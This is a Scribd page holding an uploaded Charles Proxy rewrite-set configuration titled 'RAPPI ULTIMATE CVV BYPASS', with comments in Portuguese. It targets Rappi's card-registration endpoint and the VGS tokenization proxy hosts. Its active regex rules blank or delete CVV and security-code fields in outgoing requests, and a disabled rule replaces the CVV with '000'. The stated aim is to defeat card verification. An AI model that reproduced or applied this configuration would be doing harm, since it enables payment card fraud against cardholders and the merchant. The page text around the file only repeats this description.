Scribd
Upload
14 views2 pages

newrappi

The document outlines a rewrite set for bypassing CVV checks in Rappi's payment system, featuring multiple active rules for removing or replacing CVV fields in various formats. It includes specific endpoints for card registration and sensitive data collection, as well as fallback rules for unexpected formats. The main rule actively removes CVV values while maintaining field names, with an optional rule for testing purposes that replaces CVV with a fixed value.

Uploaded by

athosc881
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
14 views2 pages

newrappi

The document outlines a rewrite set for bypassing CVV checks in Rappi's payment system, featuring multiple active rules for removing or replacing CVV fields in various formats. It includes specific endpoints for card registration and sensitive data collection, as well as fallback rules for unexpected formats. The main rule actively removes CVV values while maintaining field names, with an optional rule for testing purposes that replaces CVV with a fixed value.

Uploaded by

athosc881
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

<?charles serialisation-version='2.0' ?

>
<rewriteSet-array>
<rewriteSet>
<active>true</active>
<name>RAPPI ULTIMATE CVV BYPASS</name>
<description>Versão robusta para bypass de CVV no Rappi, compatível com
múltiplos endpoints e formatos de dados</description>
<hosts>
<locationPatterns>
<!-- Endpoint principal para registro de cartão -->
<locationMatch>
<location>
<protocol>https</protocol>
<host>services.rappi.com.br</host>
<path>/user-asset-account/api/register/v3</path>
</location>
<enabled>true</enabled>
</locationMatch>
<!-- Integração VGS para coleta de dados sensíveis -->
<locationMatch>
<location>
<protocol>https</protocol>
<host>vgs-collect-keeper.apps.verygood.systems</host>
<path>/vgs</path>
</location>
<enabled>true</enabled>
</locationMatch>
<!-- Proxy VGS para tokenização -->
<locationMatch>
<location>
<protocol>https</protocol>
<host>tntermlxyzg.live.verygoodproxy.com</host>
<path>/payment-vault/auth/token/VGS</path>
</location>
<enabled>true</enabled>
</locationMatch>
</locationPatterns>
</hosts>
<rules>
<!-- Regra principal: Remove CVV em diferentes formatos -->
<rewriteRule>
<active>true</active>
<ruleType>7</ruleType>
<matchValue>"(card_cvv|cvv|securityCode|security_code)":\s*"([0-9]
{3,4})"</matchValue>
<matchHeaderRegex>false</matchHeaderRegex>
<matchValueRegex>true</matchValueRegex>
<matchRequest>true</matchRequest>
<matchResponse>false</matchResponse>
<newValue>"$1":""</newValue>
<newHeaderRegex>false</newHeaderRegex>
<newValueRegex>false</newValueRegex>
<matchWholeValue>false</matchWholeValue>
<caseSensitive>false</caseSensitive>
<replaceType>2</replaceType>
<description>Substitui campos de CVV (card_cvv, cvv, securityCode,
security_code) por string vazia, mantendo o nome do campo</description>
</rewriteRule>
<!-- Regra opcional: Substitui CVV por valor fixo para testes (desativada por
padrão) -->
<rewriteRule>
<active>false</active>
<ruleType>7</ruleType>
<matchValue>"(card_cvv|cvv|securityCode|security_code)":\s*"([0-9]
{3,4})"</matchValue>
<matchHeaderRegex>false</matchHeaderRegex>
<matchValueRegex>true</matchValueRegex>
<matchRequest>true</matchRequest>
<matchResponse>false</matchResponse>
<newValue>"$1":"000"</newValue>
<newHeaderRegex>false</newHeaderRegex>
<newValueRegex>false</newValueRegex>
<matchWholeValue>false</matchWholeValue>
<caseSensitive>false</caseSensitive>
<replaceType>2</replaceType>
<description>Substitui CVV por "000" para simulação ou testes (ative se
necessário)</description>
</rewriteRule>

<!-- Regra de fallback: Remove campo inteiro se presente em formato


inesperado -->
<rewriteRule>
<active>true</active>
<ruleType>7</ruleType>
<matchValue>,"(card_cvv|cvv|securityCode|security_code)":\s*"[0-9]{3,4}"</
matchValue>
<matchHeaderRegex>false</matchHeaderRegex>
<matchValueRegex>true</matchValueRegex>
<matchRequest>true</matchRequest>
<matchResponse>false</matchResponse>
<newValue></newValue>
<newHeaderRegex>false</newHeaderRegex>
<newValueRegex>false</newValueRegex>
<matchWholeValue>false</matchWholeValue>
<caseSensitive>false</caseSensitive>
<replaceType>2</replaceType>
<description>Remove completamente o campo CVV com valor, incluindo a
vírgula, se o formato não for manipulável pela regra principal</description>
</rewriteRule>
</rules>
</rewriteSet>
</rewriteSet-array>

You might also like